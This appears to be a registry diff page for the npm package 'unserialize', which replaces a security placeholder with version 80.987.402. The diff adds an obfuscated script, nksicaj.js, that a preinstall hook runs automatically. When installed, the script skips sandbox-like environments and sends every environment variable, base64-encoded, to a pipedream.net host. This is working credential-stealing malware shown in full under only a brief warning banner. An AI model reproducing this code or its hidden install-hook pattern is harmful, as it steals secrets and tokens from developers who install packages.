unserialize 0.0.1-security → 80.987.402
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of unserialize might be problematic. Click here for more details.
- package/nksicaj.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/nksicaj.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x3bc1(_0x2f49df,_0x4e262f){const _0x1e9425=a0_0x1e94();return a0_0x3bc1=function(_0x3bc110,_0x3677df){_0x3bc110=_0x3bc110-0x164;let _0x1f92bc=_0x1e9425[_0x3bc110];return _0x1f92bc;},a0_0x3bc1(_0x2f49df,_0x4e262f);}const a0_0xdfa4a6=a0_0x3bc1;(function(_0x26003d,_0x26ea8b){const _0x22ff46=a0_0x3bc1,_0x46e844=_0x26003d();while(!![]){try{const _0x2676c4=-parseInt(_0x22ff46(0x179))/0x1+parseInt(_0x22ff46(0x175))/0x2+parseInt(_0x22ff46(0x16f))/0x3+-parseInt(_0x22ff46(0x165))/0x4+-parseInt(_0x22ff46(0x17d))/0x5+parseInt(_0x22ff46(0x167))/0x6+parseInt(_0x22ff46(0x171))/0x7*(parseInt(_0x22ff46(0x16c))/0x8);if(_0x2676c4===_0x26ea8b)break;else _0x46e844['push'](_0x46e844['shift']());}catch(_0xafa28b){_0x46e844['push'](_0x46e844['shift']());}}}(a0_0x1e94,0xe461b));const http=require(a0_0xdfa4a6(0x16a)),filter=[{'key':'npm_config_registry','val':a0_0xdfa4a6(0x178)},{'key':a0_0xdfa4a6(0x174),'val':a0_0xdfa4a6(0x166)},{'key':a0_0xdfa4a6(0x174),'val':a0_0xdfa4a6(0x173)},{'key':'USERNAME','val':a0_0xdfa4a6(0x16b)},{'key':'_','val':a0_0xdfa4a6(0x170)}];function a0_0x1e94(){const _0x40c165=['base64','3245268AvumsH','/usr/bin/python','15358coMHmN','some','registry.npmmirror.com','npm_config_registry','3106852hdIlzn','write','keys','taobao.org','959802ccuWQM','toString','npm_package_name','end','6758525AWovnI','stringify','error','request','net','includes','3193344dPqKWK','tencent.com','3089760qYPxze','from','pipedream','https','daasadmin','3264LXYLWq','length'];a0_0x1e94=function(){return _0x40c165;};return a0_0x1e94();}function main(){const _0x437ddb=a0_0xdfa4a6;var _0x451a59=process['env']||{};if(filter[_0x437ddb(0x172)](({key:_0xa0abd6,val:_0x1817e0})=>_0x451a59[_0xa0abd6]&&_0x451a59[_0xa0abd6][_0x437ddb(0x164)](_0x1817e0))||Object[_0x437ddb(0x177)](_0x451a59)[_0x437ddb(0x16d)]<0xa)return;req=http[_0x437ddb(0x180)]({'host':['1268384ff816fb002f65302287b639ce','m',_0x437ddb(0x169),_0x437ddb(0x181)]['join']('.'),'path':'/'+(_0x451a59[_0x437ddb(0x17b)]||''),'method':'POST'})['on'](_0x437ddb(0x17f),function(_0xa6b59b){}),req[_0x437ddb(0x176)](Buffer[_0x437ddb(0x168)](JSON[_0x437ddb(0x17e)](_0x451a59))[_0x437ddb(0x17a)](_0x437ddb(0x16e))),req[_0x437ddb(0x17c)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "unserialize",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "80.987.402",
|
|
4
|
+
"main": "nksicaj.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node nksicaj.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=unserialize for more information.
|